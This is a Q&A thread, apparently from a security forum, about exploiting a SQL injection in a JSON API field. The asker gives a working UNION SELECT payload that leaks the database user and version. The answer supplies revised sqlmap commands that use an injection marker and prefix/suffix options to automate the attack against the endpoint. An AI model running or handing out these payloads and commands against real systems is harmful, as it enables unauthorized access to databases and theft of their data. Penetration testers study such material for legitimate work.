1

This is post data, normally looks like this

{"end_date":"2018-8-26","start_date":"2018-8-26","success":1}

Below resulting "You have an error ..."

{"end_date":"2018-8-26'","start_date":"2018-8-26","success":1}

Below successfully print db version and user version

{"end_date":"00:00:00') union select 1,user(),version();--+","start_date":"","success":1}

What I've done so far is

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --sql-query="00:00:00') union select 1,user(),version();--+" -v 3

But Sqlmap still failed, where I'm doing wrong?

Thanks in advance.

Dark Cyber
  • 225
  • 1
  • 5
  • 11
  • 1
    If you cannot get SQLMap to work for your scenario, take a look at https://security.stackexchange.com/questions/183962/possible-to-use-sqlmap-when-url-changes-after-each-request/184007#184007 You should be able to solve your problem with a similar approach – Dog eat cat world Aug 27 '18 at 06:33

1 Answers1

2

You could try some of the following:

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00*","start_date":"2018-8-26","success":1}' --sql-query="') union select 1,user(),version();--+" -v 3

By using the astersisk you can tell sqlmap where to inject.

python sqlmap.py -u http://redacted.com/api/v1/endpoint --headers="Authorization: Bearer xxxx" --data='{"end_date":"00:00:00","start_date":"2018-8-26","success":1}' -p "end_date" --prefix="')" --suffix=";--+" -v 3

You can use prefix and suffix (as well as combine them with the asterisk) to precisely tell sqlmap where to put what in you injection attempt. Maybe that solves your problem already. Also you can have a closer look here.

Ben
  • 2,024
  • 8
  • 17